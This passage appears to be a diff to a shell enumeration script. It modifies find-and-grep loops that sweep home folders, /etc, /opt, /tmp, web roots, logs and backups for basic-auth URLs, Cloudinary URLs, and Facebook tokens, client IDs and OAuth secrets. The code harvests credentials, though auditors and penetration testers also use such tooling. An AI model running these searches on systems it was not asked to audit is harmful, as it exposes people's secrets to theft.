"://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+~${SED_RED}~" & +print_3title_no_nl "Searching Basic Auth Credentials (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Cloudinary Basic Auth (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+~${SED_RED}~" & +print_3title_no_nl "Searching Cloudinary Basic Auth (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Facebook Access Token (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~EAACEdEose0cBA[0-9A-Za-z]+~${SED_RED}~" & +print_3title_no_nl "Searching Facebook Access Token (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Facebook Client ID (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}~${SED_RED}~" & +print_3title_no_nl "Searching Facebook Client ID (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Facebook Oauth (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE 